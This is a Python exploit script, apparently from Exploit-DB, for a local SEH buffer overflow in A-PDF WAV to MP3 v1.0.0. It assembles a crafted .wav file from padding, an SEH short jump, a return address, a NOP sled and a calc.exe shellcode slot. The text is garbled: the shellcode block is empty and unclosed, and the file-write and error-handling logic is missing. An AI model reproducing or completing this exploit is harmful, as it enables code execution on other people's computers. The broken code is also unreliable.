#!/usr/bin/env python
# Title: A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Exloit By: Dr_IDE
# Tested On:XPSP3
# Date: August 18, 2010
# Download: http://www.brothersoft.com/a-pdf-wav-to-mp3-converter-394393.html
# Reference: http://www.exploit-db.com/exploits/14676/
# Usage: Import File, Select It, Click Play, Calc.
# Exploit-DB Notes:
# This exploit uses SEH to gain code execution, while EDB 14676 uses a direct
# EIP overwrite which is operating system specific.
# windows/exec - 303 bytesCMD=calc.exe Encoder - alpha/upper EXITFUNC - SEH
code = (
buff = ("\x41" * 4132);
nops = ("\x90" * 12);
nseh = ("\xEB\x06\x90\x90");
retn = ("\x5C\x26\x47\x00");
junk = ("\x42" * 300);
sploit = (buff+ nseh + retn + nops + code + junk);
f1 = open("Dr_IDEs.wav","w"); #No file checking, any file extension works... (.xyz .foo .abc)
print ('[*] Success. Load File.');
print ("[-] Error, could not write the file.");